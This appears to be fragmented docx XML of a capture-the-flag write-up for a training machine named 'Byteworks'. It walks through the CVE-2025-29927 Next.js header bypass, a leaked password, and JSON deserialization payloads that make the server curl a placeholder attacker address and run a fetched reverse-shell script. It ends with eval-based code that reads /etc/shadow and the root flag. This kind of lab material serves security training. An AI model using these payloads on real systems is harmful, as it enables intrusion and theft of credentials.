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dbqhu2ogylr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w2b0x53h0hhw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Byteworks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machine.If you need support,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spacing w:before="4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po8qfm2ktrl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began enumeration of the machine with the objective of identifying active services running on the system.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68500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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identified two open ports on the machine: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 view the running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application.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79700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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While analyzing the page, we identified in the contact section an email address that revealed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vhost </w:t>
      </w:r>
      <w:hyperlink r:id="rId1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byteworks.hc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added the vhost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byteworks.hc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to allow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domain resolution.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byteworks.hc"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13188"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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1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domain identified, we performed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enumerate possible subdomains.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 and added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to allow local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resolution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"http://byteworks.hc/"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FUZZ.byteworks.hc"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shubs-subdomains.txt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63900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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accessed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newly discovered subdomain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during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analyze the exposed application.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17900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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newly discovered subdomain, we performed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enumerate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directories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of the web application. The routes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identified,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requiring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authentication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 access.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http://chat.byteworks.hc/FUZZ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24200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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analyzing the application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Wappalyzer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extension, we identified that the site was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Next.js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version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15.0.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46300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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 this specific version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Next.js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there is </w:t>
      </w:r>
      <w:hyperlink r:id="rId1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CVE-2025-29927,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 authorization bypass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middleware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that allowed access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authenticated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routes simply by adding a specific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header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request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Thus, it was possible to access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 by adding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header X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware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request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X-Middleware-Subrequest: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middleware:middleware:middleware:middleware:middleware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intercepted the request using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performed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request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added the necessary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headers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bypass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authentication.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800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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it was possible to access the application’s functionalities even without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authentication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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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access to the routes depended on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specific header,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 configured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automatically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add it to all intercepted requests.</w:t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57400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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While analyzing the application, we identified an internal chat mentioning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service, including the application login credentials.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0xmIpxnKA1e5HXz1CBoY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32200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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it was an internal service, we added the subdomain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gitea.byteworks.hc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the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file to allow local resolution.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accessed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subdomain to analyze the exposed service.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6074"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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7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the credentials had already been discovered earlier, it was possible to authenticate to the service without restrictions.</w:t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94188"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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1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authenticating to the application, we identified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BookStore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repository, which contained the source code and the domain where the application was running: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http://ecomm-bookstore-staging04.byteworks.hc.</w:t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48100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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added this subdomain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allow local resolution. Upon accessing it, it was possible to view the running application.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11500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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downloaded the entire source code from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 local analysis.</w:t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Among the analyzed files,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Controller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folder was identified, containing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CartController.cs.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this implementation, the application used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Newtonsoft.Json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TypeNameHandling.All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deserialize user-controlled data on the route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/Cart/RestoreCart.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This configuration allowed the attacker to define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arbitrary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types through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$type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field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payload, resulting in instantiation of dangerous classes during the deserialization process, as evidenced by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JsonSerializerSettings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configuration.</w:t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JsonSerializerSettings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TypeNameHandling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TypeNameHandling.All,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SerializationBinder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restoredData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JsonConvert.DeserializeObject(cartData,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11500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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insecure deserialization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allowing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instantiation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System.Diagnostics.ProcessStartInfo,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deserialized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object was later used to start a process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Process.Start(),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enabling arbitrary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execution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server’s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operating system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privileges of the web application.</w:t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Thus, it was possible to execute operating system commands,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 only to validate whether the request was performed.</w:t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"{\"$type\":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\"System.Diagnostics.ProcessStartInfo,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System.Diagnostics.Process\",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\"FileName\":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\"curl\",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\"Arguments\":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\"http://&lt;vpn-ip&gt;:80\",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\"UseShellExecute\":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10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request was successfully executed, and it was possible to observe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 request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reaching our server.</w:t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38200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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it was possible to execute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downloaded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the target machine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wget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hosted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then executed on the server.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0" l="0" r="0" t="0"/>
            <wp:docPr id="10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"{\"$type\":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\"System.Diagnostics.ProcessStartInfo,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System.Diagnostics.Process\",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\"FileName\":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\"curl\",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\"Arguments\":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\"http://&lt;machine-ip&gt;:80/\",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\"UseShellExecute\":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10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executed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contained the reverse shell responsible for establishing the connection with the attacker.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"{\"$type\":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\"System.Diagnostics.ProcessStartInfo,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System.Diagnostics.Process\",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\"FileName\":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\"bash\",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\"Arguments\":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\"index.html\",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\"UseShellExecute\":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false}”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successfully received the reverse connection on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w9tf236ksbf2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obtained an interactive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TTY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7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target machine,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devteam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existed. We used the same password obtained from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authenticate as this user. The password was valid, allowing access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devteam.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0xmIpxnKA1e5HXz1CBoY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68500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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/home/devteam.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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24525" cy="895350"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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1l6lkscp8kd9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password in hand, we checked whether the user had privileges to execute commands as another user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The output showed that it was possible to execute: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/usr/bin/php /opt/byteworks/byteworks_console.php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privileges.</w:t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19200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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Below is the content of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byteworks_console.php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$applications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'dev'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['UserAPI'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'BillingService'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'WARNING',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'Chatbot'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'staging'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['UserAPI'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'BillingService'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'Chatbot'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'DEPLOYING'],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['UserAPI'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'BillingService'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'Chatbot'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"\n[byteworks@dev-console]$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(trim($input)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"help")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commands:\n";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Byteworks\n";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&lt;env&gt;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(trim($input)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"Byteworks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"Website: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http://byteworks.hc\n";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"Focus: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DevSecOps,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(trim($input)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"apps")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"Environments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monitored:\n";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staging\n";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(str_starts_with($input,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explode("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$input);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$parts[1]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(!array_key_exists($env,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$applications))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'$env'.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prod.\n";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'$env':\n";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($applications[$env]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$status)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$app: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$status\n";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(trim($input)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"exit")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console...\n";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$blacklist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'shell_exec',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'exec',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'passthru',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'proc_open',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'file_get_contents',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'file_put_contents',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'include',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'require'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($blacklist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$function)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(str_contains($input,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$function))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die("BLOCKED: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restricted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'$function'\n");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eval($input);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$e-&gt;getMessage()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 directly executed user input through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eval()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function, allowing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arbitrary PHP code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execution on the system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privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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code, it was possible to observe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blacklist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functions, as well as critical functions disabled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configuration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(php.ini)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shell_exec.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Below is the list of all disabled functions. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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/etc/php/8.3/cli/php.ini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disable_functions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1000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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all system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functions were disabled, but the file was still executed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 read internal system files with elevated privileges. We read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/etc/shadow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Linux file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$f=new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SplFileObject('/etc/shadow');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foreach($f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753100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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  It was also possible to read the flag located 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/root/root.txt.</w:t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$f=new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SplFileObject('/root/root.txt');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foreach($f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46200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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headerReference r:id="rId40" w:type="default"/>
      <w:headerReference r:id="rId41" w:type="first"/>
      <w:headerReference r:id="rId42" w:type="even"/>
      <w:footerReference r:id="rId43" w:type="default"/>
      <w:footerReference r:id="rId44" w:type="first"/>
      <w:footerReference r:id="rId4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rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.1u6uz9buoav5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99" name="image21.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image2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7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Byteworks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72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2.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId45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5.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29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hyperlink" Target="https://app.hackingclub.com/training/training-machines/273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30.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://byteworks.hc" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11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hyperlink" Target="https://projectdiscovery.io/blog/nextjs-middleware-authorization-bypass" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14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BzULQ7QXTlsICiwyOazKQn3rg==">CgMxLjAyDmguZGJxaHUyb2d5bHJ1Mg5oLncyYjB4NTNoMGhodzIOaC5xcG84cWZtMmt0cmwyDmgudzl0ZjIzNmtzYmYyMg5oLjFsNmxrc2NwOGtkOTIOaC4xdTZ1ejlidW9hdjU4AHIhMUZRZTVpNzlsUndNQXJfazdEZWpRRXJSY055eXNGQmgw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